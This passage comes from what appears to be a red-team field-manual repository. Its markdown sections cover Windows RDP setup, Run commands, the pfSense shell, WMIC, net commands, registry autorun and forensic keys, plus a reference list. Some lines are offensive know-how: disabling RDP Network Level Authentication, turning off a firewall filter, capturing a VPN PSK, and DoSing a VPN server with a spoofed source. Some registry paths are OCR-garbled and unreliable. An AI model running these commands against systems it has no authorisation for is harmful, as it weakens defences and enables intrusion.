%SystemDrive%\Users\\AppData\Roaming\Microsoft\Windows\Start\ Menu\Programs\Startup 8 | 9 | All Users: 10 | 11 | %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup 12 | 13 | Shortcut: Run -> shell:common startup 14 | 15 | [46]: https://watchthestack.files.wordpress.com/2015/03/rtfm-red-team-field-manual.pdf 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Collection/Terminal Services.md: -------------------------------------------------------------------------------- 1 | # Terminal Services[[47]] 2 | Terminal Services provides the ability to host multiple, simultaneous client sessions on Microsoft Windows Server 2003. 3 | 4 | ### Terminal Services Arhitecture 5 | 6 | ![aa.gif](https://www.dropbox.com/s/mon59ohqha3p7g8/aa.gif?dl=0&raw=1) 7 | 8 | ### Start RDP 9 | 10 | 1. Create regfile.reg file with following line in it: 11 | HKEY LOCAL t1ACHINE\SYSTEH\CurrentControlSet \Control\ TerminalService 12 | 2. "fDe~yTSCo~nections"=dword: 00000000 13 | 3. reg import reg file. reg 14 | 4. net start ''terrnservice'' 15 | 5. sc config terrnservice start= auto 16 | 6. net start terrnservice 17 | 18 | ### Disable Network Level Authentification, Add Firewall Excpetion 19 | 20 | reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \Terminal 21 | Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f 22 | netsh firewall set service type = remotedesktop mode = enable 23 | 24 | [47]: -------------------------------------------------------------------------------- /Collection/Useful Run Commands.md: -------------------------------------------------------------------------------- 1 | # Useful Run Commands [[48]] 2 | 3 | access.cpl # Accessibility Controls 4 | accwiz # Accessibility Wizard 5 | hdwwiz.cpl # Add Hardware Wizard 6 | appwiz.cpl # Add/Remove Programs 7 | control admintools # Administrative Tools 8 | acrobat # Adobe Acrobat (if installed) 9 | formdesigner # Adobe Designer (if installed) 10 | acrodist # Adobe Distiller (if installed) 11 | imageready # Adobe ImageReady (if installed) 12 | photoshop # Adobe Photoshop (if installed) 13 | wuaucpl.cpl # Automatic Updates 14 | fsquirt # Bluetooth Transfer Wizard 15 | calc # Calculator 16 | certmgr.msc # Certificate Manager 17 | charmap # Character Map 18 | chkdsk # Check Disk Utility 19 | clipbrd # Clipboard Viewer 20 | cmd # Command Prompt 21 | dcomcnfg # Component Services 22 | compmgmt.msc # Computer Management 23 | control # Control Panel 24 | timedate.cpl # Date and Time Properties 25 | ddeshare # DDE Shares 26 | devmgmt.msc # Device Manager 27 | directx.cpl # Direct X Control Panel (if installed)* 28 | dxdiag # Direct X Troubleshooter 29 | cleanmgr # Disk Cleanup Utility 30 | dfrg.msc # Disk Defragment 31 | diskmgmt.msc # Disk Management 32 | diskpart # Disk Partition Manager 33 | control desktop # Display Properties 34 | desk.cpl # Display Properties 35 | control color # Display Properties (w/Appearance Tab Preselected) 36 | drwtsn32 # Dr. Watson System Troubleshooting Utility 37 | verifier # Driver Verifier Utility 38 | eventvwr.msc # Event Viewer 39 | migwiz # Files and Settings Transfer Tool 40 | sigverif # File Signature Verification Tool 41 | findfast.cpl # Findfast 42 | firefox # Firefox (if installed) 43 | folders # Folders Properties 44 | control fonts # Fonts 45 | fonts # Fonts Folder 46 | freecell # Free Cell Card Game 47 | joy.cpl # Game Controllers 48 | gpedit.msc # Group Policy Editor (XP Prof) 49 | mshearts # Hearts Card Game 50 | helpctr # Help and Support 51 | hypertrm # HyperTerminal 52 | iexpress # Iexpress Wizard 53 | ciadv.msc # Indexing Service 54 | icwconn1 # Internet Connection Wizard 55 | iexplore # Internet Explorer 56 | inetcpl.cpl # Internet Properties 57 | inetwiz # Internet Setup Wizard 58 | ipconfig /all # IP Configuration (Display Connection Configuration) 59 | ipconfig /displaydns # IP Configuration (Display DNS Cache Contents) 60 | ipconfig /flushdns # IP Configuration (Delete DNS Cache Contents) 61 | ipconfig /release # IP Configuration (Release All Connections) 62 | ipconfig /renew # IP Configuration (Renew All Connections) 63 | ipconfig /registerdns # IP Configuration (Refreshes DHCP & Re-Registers DNS) 64 | ipconfig /showclassid # IP Configuration (Display DHCP Class ID) 65 | ipconfig /setclassid # IP Configuration (Modifies DHCP Class ID) 66 | jpicpl32.cpl # Java Control Panel (if installed) 67 | javaws # Java Control Panel (if installed) 68 | control keyboard # Keyboard Properties 69 | secpol.msc # Local Security Settings 70 | lusrmgr.msc # Local Users and Groups 71 | logoff # Logs You Out Of Windows 72 | mrt # Malicious Software Removal Tool 73 | msaccess # Microsoft Access (if installed) 74 | winchat # Microsoft Chat 75 | excel # Microsoft Excel (if installed) 76 | frontpg # Microsoft Frontpage (if installed) 77 | moviemk # Microsoft Movie Maker 78 | mspaint # Microsoft Paint 79 | powerpnt # Microsoft Powerpoint (if installed) 80 | winword # Microsoft Word (if installed) 81 | mobsync # Microsoft Syncronization Tool 82 | winmine # Minesweeper Game 83 | control mouse # Mouse Properties 84 | main.cpl # Mouse Properties 85 | nero # Nero (if installed) 86 | conf # Netmeeting 87 | control netconnections # Network Connections 88 | ncpa.cpl # Network Connections 89 | netsetup.cpl # Network Setup Wizard 90 | notepad # Notepad 91 | nvtuicpl.cpl # Nview Desktop Manager (if installed) 92 | packager # Object Packager 93 | odbccp32.cpl # ODBC Data Source Administrator 94 | osk # On Screen Keyboard 95 | ac3filter.cpl # Opens AC3 Filter (if installed) 96 | msimn # Outlook Express 97 | pbrush # Paint 98 | password.cpl # Password Properties 99 | perfmon.msc # Performance Monitor 100 | perfmon # Performance Monitor 101 | telephon.cpl # Phone and Modem Options 102 | dialer # Phone Dialer 103 | pinball # Pinball Game 104 | powercfg.cpl # Power Configuration 105 | control printers # Printers and Faxes 106 | printers # Printers Folder 107 | eudcedit # Private Character Editor 108 | QuickTime.cpl # Quicktime (If Installed) 109 | quicktimeplayer # Quicktime Player (if installed) 110 | realplay # Real Player (if installed) 111 | intl.cpl # Regional Settings 112 | regedit # Registry Editor 113 | regedit32 # Registry Editor 114 | rasphone # Remote Access Phonebook 115 | mstsc # Remote Desktop 116 | ntmsmgr.msc # Removable Storage 117 | ntmsoprq.msc # Removable Storage Operator Requests 118 | rsop.msc # Resultant Set of Policy (XP Prof) 119 | sticpl.cpl # Scanners and Cameras 120 | control schedtasks # Scheduled Tasks 121 | wscui.cpl # Security Center 122 | services.msc # Services 123 | fsmgmt.msc # Shared Folders 124 | shutdown # Shuts Down Windows 125 | mmsys.cpl # Sounds and Audio 126 | spider # Spider Solitare Card Game 127 | cliconfg # SQL Client Configuration 128 | sysedit # System Configuration Editor 129 | msconfig # System Configuration Utility 130 | sfc /scannow # System File Checker Utility (Scan Immediately) 131 | sfc /scanonce # System File Checker Utility (Scan Once At The Next Boot) 132 | sfc /scanboot # System File Checker Utility (Scan On Every Boot) 133 | sfc /revert # System File Checker Utility (Return Scan Setting To Default) 134 | sfc /purgecache # System File Checker Utility (Purge File Cache) 135 | sfc /cachesize=x # System File Checker Utility (Sets Cache Size to size x) 136 | msinfo32 # System Information 137 | sysdm.cpl # System Properties 138 | taskmgr # Task Manager 139 | tcptest # TCP Tester 140 | telnet # Telnet Client 141 | tweakui # Tweak UI (if installed) 142 | nusrmgr.cpl # User Account Management 143 | utilman # Utility Manager 144 | wab # Windows Address Book 145 | wabmig # Windows Address Book Import Utility 146 | ntbackup # Windows Backup Utility (if installed) 147 | explorer # Windows Explorer 148 | firewall.cpl # Windows Firewall 149 | magnify # Windows Magnifier 150 | wmimgmt.msc # Windows Management Infrastructure 151 | wmplayer # Windows Media Player 152 | msmsgs # Windows Messenger 153 | wiaacmgr # Windows Picture Import Wizard (need camera connected) 154 | syskey # Windows System Security Tool 155 | wupdmgr # Windows Update Launches 156 | winver # Windows Version (to show which version of windows) 157 | tourstart # Windows XP Tour Wizard 158 | write # Wordpad 159 | [48]: 160 | 161 | 162 | -------------------------------------------------------------------------------- /Collection/Using the PHP pfSense Shell.md: -------------------------------------------------------------------------------- 1 | # Using the PHP pfSense Shells [[49]] 2 | Using the PHP pfSense shell allows configuration of the config.xml file directly without needing to use the webConfigurator. 3 | 4 | ### Options 5 | ![ii.png](https://www.dropbox.com/s/3mhvnw8v1eiql99/ii.png?dl=0&raw=1) 6 | 7 | ### pfSense Developer Shell 8 | 9 | print_r($config); # To output a configuration array 10 | print_r($config['interfaces']); # To output the interfaces configuration portion of config.xml 11 | print_r($config['dhcpd']); # To output the dhcp server configuration 12 | exit # To exit the developer shell 13 | print_r(get_wireless_modes(\"ath0\")); # To output supported wireless modes for an interface 14 | $config['system']['enablesshd'] = true; # To enable SSH 15 | $config['interfaces']['optx']['wireless']['standard'] = "11a"; # Change OPTX to the OPT interface name such as BACKHAUL 16 | $config['interfaces']['optx']['wireless']['mode'] = "hostap"; 17 | $config['interfaces']['optx']['wireless']['channel'] = "6"; 18 | $config['dhcpd']['optx']['enable'] = true; # To enable dhcp server for an optx interface 19 | $config['dhcpd']['optx']['range']['from'] = "192.168.31.100"; 20 | $config['dhcpd']['optx']['range']['to'] = "192.168.31.150"; 21 | $config['system']['disablefilter'] = true; # Disable the firewall filter 22 | $config['interfaces']['optx']['disabled'] = false; # Enable an interface and configure it as a DHCP client 23 | $config['interfaces']['optx']['ipaddr'] = "dhcp"; 24 | $config['interfaces']['wan']['enable'] = true; # Enable an interface and set a static IPv4 address 25 | $config['interfaces']['wan']['ipaddr'] = "192.168.100.1"; 26 | $config['interfaces']['wan']['subnet'] = "24"; 27 | write_config(); # Save out the new configuration (config.xml) 28 | system_reboot_sync(); # Reboot the system after saving 29 | 30 | 31 | 32 | [49]: 33 | 34 | -------------------------------------------------------------------------------- /Collection/VPN.md: -------------------------------------------------------------------------------- 1 | # VPN [[50]] 2 | ### Write PSK to a file 3 | 4 | ike-scan -M -A vpn ip -P file 5 | 6 | ### DoS VPN SERVER 7 | 8 | ike-scan -A -t 1 --sourceip= spoof ip dst ip 9 | 10 | [50]: 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Collection/WMIC.md: -------------------------------------------------------------------------------- 1 | # WMIC[[51]] 2 | WMIC extends WMI for operation from several command-line interfaces and through batch scripts. Before WMIC, you used WMI-based applications (such as SMS), the WMI Scripting API, or tools such as CIM Studio to manage WMI-enabled computers. Without a firm grasp on a programming language such as C++ or a scripting language such as VBScript and a basic understanding of the WMI namespace, do-it-yourself systems management with WMI was difficult. WMIC changes this situation by giving you a powerful, user-friendly interface to the WMI namespace. 3 | 4 | ### Listing 1: Code to Display 5 | 6 | Results at the 7 | Console from a WMIC Batch File 8 | wmic /node:SERVER1, SERVER4 9 | cpu get name, caption, 10 | maxclockspeed, systemname 11 | /format:textvaluelist.xsl 12 | 13 | ### Listing 2: Code to Use Variables in a WMIC Batch File 14 | 15 | @echo off 16 | if "%1"=="" goto msg 17 | if "%2"=="" goto single 18 | wmic /node:%1, %2 cpu get name, 19 | caption, maxclockspeed, 20 | systemname 21 | /format:textvaluelist.xsl 22 | goto end 23 | :single 24 | wmic /node:%1 cpu get name, 25 | caption, maxclockspeed, 26 | systemname 27 | /format:textvaluelist.xsl 28 | goto end 29 | :msg 30 | echo you must specify at least 31 | one computer name. 32 | :end 33 | 34 | ### Listing 3: Code to Direct WMIC Output to an HTML File 35 | wmic /node:SERVER4 36 | /output:e:\file1.htm cpu get 37 | description, maxclockspeed, 38 | extclock, manufacturer, 39 | revision /format:hform.xsl 40 | ### Listing 4: Code to Direct Class 41 | Command Output to an HTML File 42 | wmic /output:e:\se_class.htm 43 | class WIN32_SOFTWAREELEMENT 44 | get 45 | ### Listing 5: Code to Generate XML Output from a WMIC Command 46 | wmic cpu get maxclockspeed 47 | /translate:basicxml 48 | /format:rawxml.xsl 49 | [51]: -------------------------------------------------------------------------------- /Collection/Windows Net_Domain Commands.md: -------------------------------------------------------------------------------- 1 | # Windows Net/Domain Commands[[52]] 2 | 3 | ### Net user - Syntax 4 | 5 | net user [ { | *} []] [/domain] 6 | net user [ { | *} /add [] [/domain]] 7 | net user [ [/delete] [/domain]] 8 | 9 | ### Net user - Examples 10 | 11 | net view \\production # To see a list of the resources shared by the \\Production computer 12 | net view /domain:sales # To see a list of the computers in the sales domain or workgroup 13 | 14 | ### Net view - Syntax 15 | 16 | net view [\\ComputerName [/CACHE] | [/ALL] | /DOMAIN[:DomainName]] 17 | 18 | ### Net group - Syntax 19 | 20 | net group [ [/comment:""]] [/domain] 21 | net group [{/add [/comment:""] | /delete} [/domain]] 22 | net group [ [ ...] {/add | /delete} [/domain]] 23 | 24 | ### Net group - Examples 25 | 26 | net group # This example lists all the groups on the local server 27 | net group exec /add # This example adds a group called Exec to the local user accounts database 28 | net group exec /add /domain # This example adds a group called Exec to the domain database 29 | net group exec estherv ralfr stevent /add # This example adds the existing user accounts estherv, ralfr, and stevent to the Exec group on the local computer 30 | net group exec estherv ralfr stevent /add /domain # This example adds the existing user accounts estherv, ralfr, and stevent to the Exec group in the domain database 31 | net group exec # This example displays users in the Exec group 32 | net group exec /comment:"The executive staff" # This example adds a comment to the Exec group record 33 | 34 | [52]: 35 | 36 | -------------------------------------------------------------------------------- /Collection/Windows Network Commands.md: -------------------------------------------------------------------------------- 1 | # Windows network commands[[53]] 2 | 3 | $ Arp # Display or manipulate the ARP information on a network device or computer. 4 | $ Finger # The finger command available in Unix and Linux variants allows a user to find sometimes personal information about a user. 5 | $ Hostname # The hostname command displays the host name of the Windows XP computer currently logged into 6 | $ Ipconfig # Display the network settings currently assigned and given by a network 7 | $ Pathping # Pathping is an MS-DOS utility available for Microsoft Windows 2000 and Windows XP users. This utility enables a user to find network latency and network loss 8 | $ Ping # Pinging another address helps determine if the network card can communicate within the local network or outside network 9 | $ Nbstat # The nbtstat MS-DOS utility that displays protocol statistics and current TCP/IP connections using NBT 10 | $ Net # The net command is available in MS-DOS and Windows and is used to set, view, and determine network settings 11 | $ Netstat # The netstat command is used to display the TCP/IP network protocol statistics and information 12 | $ Nslookup # The nslookup MS-DOS utility that enables a user to do a reverse lookup on an IP address of a domain or host on a network 13 | $ Route # The route MS-DOS utility enables computers to view and modify the computer's route table 14 | & Tracert and traceroute # It allows you to view a listing of how a network packet travels through the network and where it may fail or slow down 15 | $ Whois # The whois command available in Unix and Linux variants helps allow a user to identify a domain name. This command provides information about a domain name much like the WHOIS on network solutions. 16 | $ Winipcfg # The winipcfg command available in Windows allows a user to display network and network adapter information. Here, a user can find such information as an IP address, Subnet Mask, Gateway, etc. 17 | 18 | 19 | 20 | [53]: 21 | 22 | -------------------------------------------------------------------------------- /Collection/Windows System Info Commands.md: -------------------------------------------------------------------------------- 1 | # Systeminfo[[54]] 2 | 3 | ### Syntax 4 | 5 | systeminfo [/s [/u \ [/p ]]] [/fo {TABLE | LIST | CSV}] [/nh] 6 | 7 | /s # Specifies the name or IP address of a remote computer 8 | /u # Runs the command with the account permissions of the specified user account 9 | /p # Specifies the password of the user account that is specified in the /u parameter 10 | /fo # Specifies the output format 11 | /nh # Suppresses column headers in the output. 12 | /? # Displays help at the command prompt. 13 | 14 | # Tasklist 15 | 16 | ### Syntax 17 | 18 | tasklist[.exe] [/s computer] [/u domain\user [/p password]] [/fo {TABLE|LIST|CSV}] [/nh] [/fi FilterName [/fi FilterName2 [ ... ]]] [/m [ModuleName] | /svc | /v] 19 | # Reg query 20 | 21 | ### Syntax 22 | reg query [{/v | /ve}] [/s] [/se ] [/f ] [{/k | /d}] [/c] [/e] [/t ] [/z] 23 | 24 | /ve # Runs a query for value names that are empty 25 | /s # Specifies to query all subkeys and value names recursively 26 | /se # Specifies the single value separator to search for in the value name type REG_MULTI_SZ 27 | /f # Specifies the data or pattern to search for 28 | /k # Specifies to search in key names only 29 | /d # Specifies to search in data only 30 | /c # Specifies that the query is case sensitive 31 | /e # Specifies to return only exact matches 32 | /t # Specifies registry types to search 33 | /z # Specifies to include the numeric equivalent for the registry type in search results 34 | 35 | 36 | [54]: -------------------------------------------------------------------------------- /Collection/Windows Versions.md: -------------------------------------------------------------------------------- 1 | # Windows Versions [[55]] 2 | 3 | NT 3.1 # Windows NT 3.1 (All) 4 | NT 3.2 # Windows NT 3.5 (All) 5 | NT 3.51 # Windows NT 3.51 (All) 6 | NT 4.0 # Windows NT 4.0 (All) 7 | NT 5.0 # Windows 2000 (All) 8 | NT 5.1 # Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded) 9 | NT 5.2 # Windows XP (64-bit, Pro 64-bit), Windows Server 2003 & R2 (Standard, Enterprise), Windows Home Server 10 | NT 6.0 # Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate), Windows Server 2008 (Foundation, Standard, Enterprise) 11 | NT 6.1 # Windows 7 (Starter, Home, Pro, Enterprise, Ultimate), Windows Server 2008 R2 (Foundation, Standard, Enterprise) 12 | NT 6.2 # Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)), Windows Phone 8, Windows Server 2012 (Foundation, Essentials, Standard) 13 | NT 6.3 # Windows 8.1 (Pro, Enterprise), Windows Server 2012 R2 (Foundation, Essentials, Standard, Datacenter) 14 | NT 10.0 # Windows 10 (Home, Pro, Pro Education, Enterprise, Enterprise LTSB, Education, Mobile, Mobile Enterprise, IoT Core, IoT Enterprise, IoT Mobile Enterprise), Windows Server 2016 (Essentials, Standard, Datacenter) 15 | 16 | [55]: 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /Collection/Windows registry.md: -------------------------------------------------------------------------------- 1 | # Windows registry[[56]] 2 | 3 | ### Structure of the Windows Registry (hives) 4 | 5 | HKEY_CLASSES_ROOT # Information stored here ensures that the correct program opens when it is executed in Windows Explorer. 6 | HKEY_CURRENT_USER # Contains configuration information for the user who is currently logged into the system, including user's folders, screen colors, and Control Panel settings 7 | HKEY_LOCAL_MACHINE # Contains machine hardware-specific information that the operating system runs on 8 | HKEY_USERS # Contains configuration information of all user profiles on the system, which concerns application configurations, and visual settings 9 | HKEY_CURRENT_CONFIG # Stores information about the systems current configuration. Alias for: HKLM\Config\profile 10 | 11 | ### Autorun locations 12 | 13 | HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce 14 | HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run 15 | HKLM\Software\Microsoft\Windows\CurrentVersion\Run 16 | HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run 17 | HKCU\Software\Microsoft\Windows\CurrentVersion\Run 18 | HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 19 | (ProfilePath)\Start Menu\Programs\Startup 20 | 21 | ### MRU lists 22 | 23 | MRU, or 'most recently used' lists contain entries made due to specific actions performed by the user. There are numerous MRU lists located throughout various Registry keys. 24 | 25 | HKCU\Software\Microsoft\Windows\ CurrentVersion\Explorer\RunMRU 26 | 27 | ### UserAssist 28 | The UserAssist key contains two or more subkeys which have long hexadecimal names that appear as globally unique identifiers (GUIDs). Each subkey records values that pertain to specific objects the user has accessed on the system, such as Control Panel applets, shortcut files, programs, etc. 29 | 30 | HCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist 31 | 32 | These values however, are encoded using a ROT- 13 encryption algorithm, sometimes known as a Caesar cipher. This particular encryption technique is quite easy to decipher, as each character is substituted with the character 13 spaces away from it in the ASCII table. 33 | With the UserAssist key, a forensic examiner can gain a better understanding of what types of files or applications have been accessed on a particular system. 34 | 35 | ### Wireless netoworks 36 | 37 | HKLM\SOFTWARE\ Microsoft\WZCSVC\Parameters\Interfaces key # SSIDs 38 | HKLM\SYSTEM\ControlSet001\ Services\Tcpip\Parameters\Interfaces\ # flynn-net 39 | 40 | ### LAN computers 41 | 42 | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions. # List of devices, including desktop computers, laptops, and printers 43 | 44 | ### USB Devices 45 | 46 | HKLM\SYSTEM\ControlSet00x\Enum\USBSTOR # Key stores the contents of the product and device ID values of any USB device that has ever been connected to the system 47 | 48 | ### Mounted devices 49 | 50 | HKLM\SYSTEM\MountedDevices # Stores a database of mounted volumes that is used by the NTFS file system 51 | 52 | ### Firefox 53 | Firefox has limited footprints regarding Registry activity. Firefox stores web history in a history.dat file, which is in ASCII format and plainly visible when opened. 54 | 55 | C:\Documents and Settings\User Profile\Application Data\Mozilla\Firefox\Profiles\x.default\ 56 | 57 | 58 | [56]: -------------------------------------------------------------------------------- /Literatura.md: -------------------------------------------------------------------------------- 1 | # Literatura 2 | 3 | 1. Arcege, Problem answer, dostupno od 16.01.2017. na http://unix.stackexchange.com/a/19015 4 | 2. ArrOway, Penetration Testing Tools Cheat Sheet, dostupno od 16.01.2017. na https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#brute-forcing-services 5 | 3. redhat, Using the chkconfig Utility, dostupno od 16.01.2017. na https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Deployment_Guide/s2-services-chkconfig.html 6 | 4. Cisco, Using the Command-Line Interface, dostupno od 16.01.2017. na http://www.cisco.com/c/en/us/td/docs/ios/12_2/configfun/configuration/guide/ffun_c/fcf001.html 7 | 5. Davis, 10 commands you should master when working with the Cisco IOS, dostupno od 16.01.2017. na http://www.techrepublic.com/blog/data-center/10-commands-you-should-master-when-working-with-the-cisco-ios-104071/ 8 | 6. Stretch J., Common ports, dostupno od 16.01.2017. na http://packetlife.net/media/library/23/common_ports.pdf 9 | 7. Shrestha N., 12 Tcpdump Commands – A Network Sniffer Tool, dostupno od 16.01.2017. na http://www.tecmint.com/12-tcpdump-commands-a-network-sniffer-tool/ 10 | 8. NMAP, Nmap Network Scanning, dostupno od 16.01.2017. na https://nmap.org/book/output-formats-grepable-output.html 11 | 9. ArrOway et.al., 2016. 12 | 10. Glenn W., The Best Tools Hidden in Windows' Command Line, dostupno od 16.01.2017. na http://lifehacker.com/the-best-tools-hidden-in-windows-command-line-1553193077 13 | 11. Occupytheweb, How to Cover Your Tracks & Leave No Trace Behind on the Target System, dostupno od 16.01.2017. na http://null-byte.wonderhowto.com/how-to/hack-like-pro-cover-your-tracks-leave-no-trace-behind-target-system-0148123/ 14 | 12. Hauser, How to cover your tracks, dostupno od 16.01.2017. na http://www.ouah.org/cover_your_tracks1.html 15 | 13. DGhost, Banning an entire country with IPTables/IPSet, dostupno od 16.01.2017. na http://www.dghost.com/techno/internet/banning-an-entire-country-with-iptablesipset 16 | 14. Brown K., The Beginner’s Guide to iptables, the Linux Firewall, dostupno od 16.01.2017. na http://www.howtogeek.com/177621/the-beginners-guide-to-iptables-the-linux-firewall/ 17 | 15. Allard C., Cohen D., IPCHAINS Firewall Example, dostupno od 16.01.2017. na http://oceanpark.com/notes/firewall_example.html 18 | 16. Harrison P., Linux Firewalls Using iptables, dostupno od 16.01.2017. na http://www.linuxhomenetworking.com/wiki/index.php/Quick_HOWTO_:_Ch14_:_Linux_Firewalls_Using_iptables#.WH1DaNRACdK 19 | 17. Wikipedia, Classful network, dostupno od 16.01.2017. na https://en.wikipedia.org/wiki/Classful_network 20 | 18. Wikipedia, Reserved IP addresses, dostupno od 16.01.2017. na https://en.wikipedia.org/wiki/Reserved_IP_addresses 21 | 19. Tutorialspoint, IPv4 - Subnetting, dostupno od 16.01.2017. na https://www.tutorialspoint.com/ipv4/ipv4_subnetting.htm 22 | 20. Jodies K., IP-Calculator, dostupno od 16.01.2017. na http://jodies.de/ipcalc?host=192.168.0.1&mask1=24&mask2= 23 | 21. oej, IPv6: Goodbye to broadcast, say hello to Multicast, http://ipv6friday.org/blog/2011/12/ipv6-multicast/ 24 | 22. R. Hinden, S. Deering, IP Version 6 Addressing Architecture, dostupno od 16.01.2017. na https://tools.ietf.org/html/rfc4291#appendix-A 25 | 23. ports, THC-IPV6, dostupno od 16.01.2017. na http://tools.kali.org/information-gathering/thc-ipv6 26 | 24. TechLog360, A-Z Kali Linux Commands, dostupno od 16.01.2017. na https://techlog360.com/a-z-kali-linux-commands/ 27 | 25. penguintutor, Linux misc commands quick reference guide, dostupno od 16.01.2017. na http://www.penguintutor.com/linux/misc-quickreference 28 | 26. Cobbaut P., Linux networking, dostupno od 16.01.2017. na http://linux-training.be/linuxnet.pdf 29 | 27. Superuser, Bash scripting Tutorial, dostupno od 16.01.2017. na https://linuxconfig.org/bash-scripting-tutorial 30 | 28. SuperJediWombat, Answer,dostupno od 16.01.2017. na http://www.commandlinefu.com/commands/view/3144/ping-sweep-without-nmap 31 | 29. Superuser, How to crash your Linux system with fork bomb, dostupno od 16.01.2017. na https://linuxconfig.org/how-to-crash-your-linux-system-with-fork-bomb 32 | 30. Tenzer, Answer, dostupno od 16.01.2017. na https://www.zabbix.com/forum/showpost.php?p=31561&postcount=2 33 | 31. tokind, Complete recipe for monitoring DNS and NTP on your Network, dostupno od 16.01.2017. na https://www.zabbix.com/forum/showpost.php?p=31549&postcount=1 34 | 32. Phillips T., Shell Scripting Crash Course dostupno od 16.01.2017. na http://wiki.jaxhax.org/images/9/94/Shell_Scripting_Crash_Course.pdf 35 | 33. Gite V.,Linux Iptables Firewall Shell Script For Standalone Server, dostupno od 16.01.2017. na https://bash.cyberciti.biz/firewall/linux-iptables-firewall-shell-script-for-standalone-server/ 36 | 34. Moon S., 16 commands to check hardware information on Linux dostupno od 16.01.2017. na http://www.binarytides.com/linux-commands-hardware-info/ 37 | 35. LinuxCommand.org, Manipulating Files, dostupno od 16.01.2017. na http://linuxcommand.org/lts0050.php 38 | 36. ArrOway et.al., 2016. 39 | 37. Clark B. Red Team Field Manual, dostupno od 16.01.2017. na https://watchthestack.files.wordpress.com/2015/03/rtfm-red-team-field-manual.pdf 40 | 38. Shrestha N. et.al., 2012 41 | 39. ArrOway et.al., 2016. 42 | 40. ss64, An A-Z Index of Windows PowerShell commands, dostupno od 16.01.2017. na http://ss64.com/ps/ 43 | 41. Russinovich M., PsExec v2.11, dostupno od 16.01.2017. na https://technet.microsoft.com/en-us/sysinternals/pxexec.aspx 44 | 42. Jofre J., Running Remote Commands, dostupno od 16.01.2017. na https://msdn.microsoft.com/en-us/powershell/scripting/core-powershell/running-remote-commands 45 | 43. Mauro D., Schmidt K., Essential SNMP, dostupno od 17.01.2017. na http://www.cert.hr/sites/default/files/NCERT-PUBDOC-2010-09-313.pdf 46 | 44. Oracle, SNMP Command Examples, dostupno od 17.01.2017. na https://docs.oracle.com/cd/E19201-01/820-6413-13/SNMP_commands_reference_appendix.html 47 | 45. Clark B. et.al., 2013. 48 | 46. Clark B. et.al., 2013. 49 | 47. TechNet, How Terminal Services Works, dostupno od 17.01.2017. na https://technet.microsoft.com/en-us/library/cc755399(v=ws.10).aspx 50 | 48. mypcshell, 156 Useful Run Commands, dostupno od 17.01.2017. na http://mypchell.com/guides/34-guides/69-156-useful-run-commands 51 | 49. pfSense, Using the PHP pfSense Shell, dostupno od 17.01.2017. na https://doc.pfsense.org/index.php/Using_the_PHP_pfSense_Shell 52 | 50. ike-scan, The IKE Scanner, dostupno od 17.01.2017. na https://github.com/royhills/ike-scan 53 | 51. Wilansky E., WMIC - Take Command-line Control over WMI, dostupno od 17.01.2017. na https://msdn.microsoft.com/en-us/library/bb742610.aspx 54 | 52. TechNet, Net group, dostupno od 17.01.2017. na https://technet.microsoft.com/en-us/library/cc754051(v=ws.11).aspx 55 | 53. ComputerHope, Help with ping, winipcfg, and other network commands, dostupno od 17.01.2017. na http://www.computerhope.com/issues/ch000444.htm 56 | 54. TechNet, Systeminfo, dostupno od 17.01.2017. na https://technet.microsoft.com/en-us/library/cc771190(v=ws.11).aspx 57 | 55. Wikipedia, List of Microsoft Windows versions, dostupno od 17.01.2017. na https://en.wikipedia.org/wiki/List_of_Microsoft_Windows_versions 58 | 56. Farmer Derrick J., A Forensic Analysis Of The Windows Registry, dostupno od 17.01.2017. na http://www.forensicfocus.com/a-forensic-analysis-of-the-windows-registry 59 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Manual 2 | ====== 3 | 4 | Table of contents 5 | ================= 6 | 7 | **Linux** 8 | 9 | * [Linux Network Commands](#linux-network-commands) 10 | * [Linux System Info](#linux-system-info) 11 | * [Manipulating files](#manipulating-files) 12 | * [Linux Misc Commands](#linux-misc-commands) 13 | * [Hide Your Tracks](#hide-your-tracks) 14 | * [Linux Scripting](#linux-sripting) 15 | * [IP Tables](#ip-tables) 16 | * [Automatically run commands over SSH on many servers](#automatically-run-commands-over-ssh-on-many-servers) 17 | * [CHKCONFIG](#chkconfig) 18 | * [Kali Linux Commands](#kali-linux-commands) 19 | * [Solaris](#solaris) 20 | 21 | **Windows** 22 | 23 | - [Windows Versions](#windows-versions) 24 | - [Startup Directories](#startup-directories) 25 | - [Useful Run Commands](#useful-run-commands) 26 | - [Windows System Info Commands](#windows-system-info-commands) 27 | - [Windows Net_Domain Commands](#windows-net_domain-commands) 28 | - [Running Remote Commands](#running-remote-commands) 29 | - [Windows Network Commands](#windows-netowrk-commands) 30 | - [Hidden tools in Command Line](#hidden-tools-in-command-line) 31 | - [Miscellaneous Commands Windows](#miscellaneous-commands-windows) 32 | - [PsExec](#psexec) 33 | - [Terminal Services](#terminal-services) 34 | - [WMIC](#wmic) 35 | - [Powershell](#powershell) 36 | - [Windows Registry](#windows-registry) 37 | 38 | **Networking** 39 | 40 | - [Common ports](#common-ports) 41 | - [IPv4](#ipv4) 42 | - [IPv6](#ipv6) 43 | - [Cisco commands](#cisco-commands) 44 | - [SNMP](#snmp) 45 | - [Packet Capturing](#packet-capturing) 46 | - [DNS](#dns) 47 | - [VPN](#vpn) 48 | 49 | **PenTesting** 50 | 51 | - [Brute Forcing Services](#brute-forcing-services) 52 | - [Exploit Research](#exploit-research) 53 | - [Metasploit](#metasploit) 54 | - [Password Cracking](#password-cracking) 55 | 56 | **Literatura** 57 | 58 | - [References](Literatura.md) 59 | 60 | Linux Network Commands 61 | ---------------------- 